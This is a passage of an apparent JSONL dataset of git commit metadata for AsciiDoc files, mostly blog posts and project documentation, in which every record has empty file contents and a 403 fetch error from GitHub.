uppercase.","repos":"ThiagoGarciaAlves\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,wenpos\/elasticsearch,scottsom\/elasticsearch,qwerty4030\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,umeshdangat\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,wangtuo\/elasticsearch,maddin2016\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,wangtuo\/elasticsearch,LeoYao\/elasticsearch,naveenhooda2000\/elasticsearch,masaruh\/elasticsearch,mohit\/elasticsearch,brandonkearby\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,winstonewert\/elasticsearch,fred84\/elasticsearch,nknize\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,jimczi\/elasticsearch,alexshadow007\/elasticsearch,s1monw\/elasticsearch,alexshadow007\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,scottsom\/elasticsearch,s1monw\/elasticsearch,mohit\/elasticsearch,mjason3\/elasticsearch,fred84\/elasticsearch,nezirus\/elasticsearch,lks21c\/elasticsearch,jimczi\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,sneivandt\/elasticsearch,strapdata\/elassandra,nezirus\/elasticsearch,markwalkom\/elasticsearch,nezirus\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nknize\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,kalimatas\/elasticsearch,umeshdangat\/elasticsearch,lks21c\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,winstonewert\/elasticsearch,masaruh\/elasticsearch,coding0011\/elasticsearch,maddin2016\/elasticsearch,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,qwerty4030\/elasticsearch,mjason3\/elasticsearch,winstonewert\/elasticsearch,fred84\/elasticsearch,naveenhooda2000\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,masaruh\/elasticsearch,Stacey-Gammon\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,vroyer\/elasticassandra,scorpionvicky\/elasticsearch,wangtuo\/elasticsearch,nknize
\/elasticsearch,markwalkom\/elasticsearch,shreejay\/elasticsearch,scottsom\/elasticsearch,mohit\/elasticsearch,fred84\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,wenpos\/elasticsearch,nezirus\/elasticsearch,robin13\/elasticsearch,lks21c\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,qwerty4030\/elasticsearch,HonzaKral\/elasticsearch,jimczi\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,jimczi\/elasticsearch,gfyoung\/elasticsearch,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,maddin2016\/elasticsearch,coding0011\/elasticsearch,masaruh\/elasticsearch,shreejay\/elasticsearch,umeshdangat\/elasticsearch,mohit\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,shreejay\/elasticsearch,maddin2016\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,GlenRSmith\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,pozhidaevak\/elasticsearch,lks21c\/elasticsearch,alexshadow007\/elasticsearch,Stacey-Gammon\/elasticsearch,gfyoung\/elasticsearch,s1monw\/elasticsearch,mohit\/elasticsearch,vroyer\/elasticassandra,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,naveenhooda2000\/elasticsearch,s1monw\/elasticsearch,maddin2016\/elasticsearch,sneivandt\/elasticsearch,sneivandt\/elasticsearch,naveenhooda2000\/elasticsearch,gfyoung\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,fred84\/elasticsearch,uschindler\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,brandonkearby\/elasticsearch,sneivandt\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,lks21c\/elasticsearch,winstonewert\/elasticsearch,markwalkom\/elasticsearch,winstonewert\/elasticsearch,qwerty4030\/elasticsearch,rajanm\/elasticsearch,qwerty4030\/elasticsearch,brandonkearby\/elasticsearch,umeshdangat\/elasticsearch,s1monw\/elasticsearch,pozhidaevak\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,nezirus\/elasticsearch,vroyer\/elassandra,kalimatas\/elasticsearch,vroyer\/elasticassandra,coding0011\/elasticsearch,shreejay\/elasticsearch,LeoYao\/elasticsearch,alexshadow007\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,masaruh\/elasticsearch,vroyer\/elassandra,markwalkom\/elasticsearch,mjason3\/elasticsearch,alexshadow007\/elasticsearch,naveenhooda2000\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,LeoYao\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/reference\/indices\/aliases.asciidoc","new_file":"docs\/reference\/indices\/aliases.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cef556664e691df8e49d55fcf30800f5f88575ba","subject":"Update 2016-10-25-Genetica.adoc","message":"Update 2016-10-25-Genetica.adoc","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2016-10-25-Genetica.adoc","new_file":"_posts\/2016-10-25-Genetica.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ricardozanini\/ricardozanini.github.io.git\/': The requested 
URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41fcbb911b760539be2dab986d3c3f5e936cb245","subject":"Update 2016-12-18-About-Me.adoc","message":"Update 2016-12-18-About-Me.adoc","repos":"chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io","old_file":"_posts\/2016-12-18-About-Me.adoc","new_file":"_posts\/2016-12-18-About-Me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chowwin\/chowwin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53411d37194578466513f76a1de475b89801d739","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a5c386deff477f3afaf6439790e8285fb93dfb4","subject":"Update 2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","message":"Update 2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","new_file":"_posts\/2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18b96aed5bfd3285a1071c3cfec3b4011fc8bce4","subject":"Update 2016-12-2-3-Dpen.adoc","message":"Update 2016-12-2-3-Dpen.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-Dpen.adoc","new_file":"_posts\/2016-12-2-3-Dpen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"855e2ca2e28be1122725291d10a1970563abfbfa","subject":"Update 2017-03-27-tor-relay-on-windows.adoc","message":"Update 2017-03-27-tor-relay-on-windows.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2017-03-27-tor-relay-on-windows.adoc","new_file":"_posts\/2017-03-27-tor-relay-on-windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1feb8cf448acc767f7c3929f86a32e9462e8655","subject":"Update dbm-drop-all.adoc","message":"Update 
dbm-drop-all.adoc","repos":"jako512\/grails-database-migration,sbglasius\/grails-database-migration","old_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-drop-all.adoc","new_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-drop-all.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jako512\/grails-database-migration.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"930b5db4448db5f7884a26833888db956c1b8c6a","subject":"Update 2015-10-08-Rabota-s-zavisimostyami-i-prostranstvom-imen-v-JavaScript.adoc","message":"Update 2015-10-08-Rabota-s-zavisimostyami-i-prostranstvom-imen-v-JavaScript.adoc","repos":"KlimMalgin\/klimmalgin.github.io,KlimMalgin\/klimmalgin.github.io,KlimMalgin\/klimmalgin.github.io","old_file":"_posts\/2015-10-08-Rabota-s-zavisimostyami-i-prostranstvom-imen-v-JavaScript.adoc","new_file":"_posts\/2015-10-08-Rabota-s-zavisimostyami-i-prostranstvom-imen-v-JavaScript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KlimMalgin\/klimmalgin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e95021884e206186b03c8dc076b44658731c549","subject":"- Initial version of the release documentation","message":"- Initial version of the release documentation\n","repos":"queeniema\/incubator-edgent,dlaboss\/incubator-edgent,queeniema\/incubator-edgent,queeniema\/incubator-edgent,dlaboss\/incubator-edgent,dlaboss\/incubator-edgent,dlaboss\/incubator-edgent,queeniema\/incubator-edgent","old_file":"src\/site\/asciidoc\/releasing.adoc","new_file":"src\/site\/asciidoc\/releasing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/queeniema\/incubator-edgent.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f23bfa651f5a3be7ff6b5ccca32c24c87b4e628d","subject":"y2b create post Unboxing The $4000 Razer Gaming Laptop","message":"y2b create post Unboxing The $4000 Razer Gaming Laptop","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-31-Unboxing-The-4000-Razer-Gaming-Laptop.adoc","new_file":"_posts\/2017-05-31-Unboxing-The-4000-Razer-Gaming-Laptop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09fa4229161032dd461232a3e9bc3e104caf71bc","subject":"Fix typo in the correct place","message":"Fix typo in the correct place\n","repos":"asashour\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework","old_file":"documentation\/articles\/IntegratingAnExistingGWTWidget.asciidoc","new_file":"documentation\/articles\/IntegratingAnExistingGWTWidget.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"0d1ec42147e56d032ba66dc9cfacc2f3fa928451","subject":"Update 2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","message":"Update 2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","new_file":"_posts\/2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acf3767fde6d00384e9772f1f09a953368b98f9f","subject":"y2b create post The Dual Screen, Foldable Smartphone Is REAL!","message":"y2b create post The Dual Screen, Foldable Smartphone Is REAL!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-08-The-Dual-Screen-Foldable-Smartphone-Is-REAL.adoc","new_file":"_posts\/2017-11-08-The-Dual-Screen-Foldable-Smartphone-Is-REAL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5bfb3a2cdf6e6e994f641451164d8aa6c329cc4f","subject":"Update 2010-07-14-Scala-280.adoc","message":"Update 2010-07-14-Scala-280.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2010-07-14-Scala-280.adoc","new_file":"_posts\/2010-07-14-Scala-280.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbf214eb4e10de68eea948777f49389c83bcecd7","subject":"Update 2016-10-17-algo-8986.adoc","message":"Update 2016-10-17-algo-8986.adoc","repos":"tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr","old_file":"_posts\/2016-10-17-algo-8986.adoc","new_file":"_posts\/2016-10-17-algo-8986.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tmdgus0118\/blog.code404.co.kr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ab80a7a0a62ed608972155cf41c3ef43c1a7b3c","subject":"Update 2016-11-08-Hello-you.adoc","message":"Update 2016-11-08-Hello-you.adoc","repos":"hayyuelha\/technical-blog,hayyuelha\/technical-blog,hayyuelha\/technical-blog,hayyuelha\/technical-blog","old_file":"_posts\/2016-11-08-Hello-you.adoc","new_file":"_posts\/2016-11-08-Hello-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hayyuelha\/technical-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7bc73f498056d7b9ae4420689eb54cb38d2ff8a9","subject":"y2b create post World's Loudest Bluetooth Speaker!","message":"y2b create post World's Loudest Bluetooth 
Speaker!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-04-Worlds-Loudest-Bluetooth-Speaker.adoc","new_file":"_posts\/2017-02-04-Worlds-Loudest-Bluetooth-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"915303437e15d23a6e0583e85747d843eee844df","subject":"y2b create post Sony MDR-570LP Headphones Unboxing \\u0026 Review","message":"y2b create post Sony MDR-570LP Headphones Unboxing \\u0026 Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-01-Sony-MDR570LP-Headphones-Unboxing-u0026-Review.adoc","new_file":"_posts\/2011-12-01-Sony-MDR570LP-Headphones-Unboxing-u0026-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4d0cb9a3047847f87037a963018850c8079ec6d","subject":"Update 2017-03-14-Workflow-Needs-slightly-pretentious-How-I-work.adoc","message":"Update 2017-03-14-Workflow-Needs-slightly-pretentious-How-I-work.adoc","repos":"thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io","old_file":"_posts\/2017-03-14-Workflow-Needs-slightly-pretentious-How-I-work.adoc","new_file":"_posts\/2017-03-14-Workflow-Needs-slightly-pretentious-How-I-work.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomaszahr\/thomaszahr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c67e1368c18933129fe0e9e52796e1dbdba1f70","subject":"Update 2016-11-17-NSUCRYPTO-2016.adoc","message":"Update 2016-11-17-NSUCRYPTO-2016.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48b754b7e40d1baeebbeb959dfa072eef2db4352","subject":"y2b create post Is The LG V30 The Most Underrated Smartphone?","message":"y2b create post Is The LG V30 The Most Underrated Smartphone?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-03-Is-The-LG-V30-The-Most-Underrated-Smartphone.adoc","new_file":"_posts\/2018-02-03-Is-The-LG-V30-The-Most-Underrated-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2405f0c2221d1f2a4ec45af376a586f2c9077e2","subject":"tep-1001: mark tests done","message":"tep-1001: mark tests done\n\nSigned-off-by: jaa127 
<5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"todo\/tests.adoc","new_file":"todo\/tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ec6d0393745aab873be6a899cb780466cdaa856","subject":"Update 2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","message":"Update 2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72325366a4d611c6029b0427ace61a64ec7a4541","subject":"Update 2015-02-20-El-Gran-libro-de-HTML5-CSS3-y-JavaScript.adoc","message":"Update 2015-02-20-El-Gran-libro-de-HTML5-CSS3-y-JavaScript.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-02-20-El-Gran-libro-de-HTML5-CSS3-y-JavaScript.adoc","new_file":"_posts\/2015-02-20-El-Gran-libro-de-HTML5-CSS3-y-JavaScript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82365b0467aa8f5ea07fe2de74bdf674b3d5ddfd","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8414fda05d6572951b1c9f5cf808b7092df31724","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff43832aecab9d97a2807be754f4d6898ace5641","subject":"Update 2015-07-12-Hi.adoc","message":"Update 2015-07-12-Hi.adoc","repos":"cherurg\/hubpress.io,cherurg\/hubpress.io,cherurg\/hubpress.io","old_file":"_posts\/2015-07-12-Hi.adoc","new_file":"_posts\/2015-07-12-Hi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cherurg\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"43b163085f142d542fb07cdae8ee6f2c01ca9a70","subject":"Fix objectfilter link","message":"Fix objectfilter 
link","repos":"joachimmetz\/artifacts,Onager\/artifacts,joachimmetz\/artifacts,pstirparo\/artifacts,ForensicArtifacts\/artifacts,pstirparo\/artifacts,ForensicArtifacts\/artifacts,Onager\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joachimmetz\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"48427551f593a5c04d6054ed416d815c9a1dade6","subject":"Update 2015-10-25-Deadlock-and-its-prevention.adoc","message":"Update 2015-10-25-Deadlock-and-its-prevention.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-25-Deadlock-and-its-prevention.adoc","new_file":"_posts\/2015-10-25-Deadlock-and-its-prevention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3bf8df4c5f5014617d48a5df5281d114c9022752","subject":"Update 2015-11-24-Borg-Deduplicating-Archiver.adoc","message":"Update 2015-11-24-Borg-Deduplicating-Archiver.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc","new_file":"_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2ed952e4a0c203804c6e65aed8baa5c646119b1","subject":"Create JavaDefensiveProgrammingTips.adoc","message":"Create JavaDefensiveProgrammingTips.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"JavaDefensiveProgrammingTips.adoc","new_file":"JavaDefensiveProgrammingTips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"9156f505e9adf8ef5029d448582442a7bcd7a164","subject":"Delete the file at '_posts\/2017-05-04-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc'","message":"Delete the file at '_posts\/2017-05-04-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-04-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","new_file":"_posts\/2017-05-04-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0e0de3ebefbc4f438170aca3f02f6e8c922855a","subject":"Update 2015-08-24-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 
2015-08-24-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-24-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-24-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e3bb6c8e483cf0c5c91629b79f88e74d10b16af","subject":"[Add] Blog post","message":"[Add] Blog post\n","repos":"skybon\/rigsofrods-website,skybon\/rigsofrods-website,skybon\/rigsofrods-website,skybon\/rigsofrods-website","old_file":"blog\/source\/blog\/2015-08-17-railway-switches-are-working-now\/index.adoc","new_file":"blog\/source\/blog\/2015-08-17-railway-switches-are-working-now\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skybon\/rigsofrods-website.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"285db40cf260cff114197b5d52e07a7a10a7e4fa","subject":"Update 2016-01-04-Blog-Title.adoc","message":"Update 2016-01-04-Blog-Title.adoc","repos":"ylliac\/ylliac.github.io,ylliac\/ylliac.github.io,ylliac\/ylliac.github.io","old_file":"_posts\/2016-01-04-Blog-Title.adoc","new_file":"_posts\/2016-01-04-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ylliac\/ylliac.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ce5ddfa0d6515dab03f47d04df9aced8d44afcb","subject":"Formatting changes","message":"Formatting changes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d90acda768b7e2d640cf5dbe6e813b7f7a13c65d","subject":"Update 2016-04-19-N-I-X-porn.adoc","message":"Update 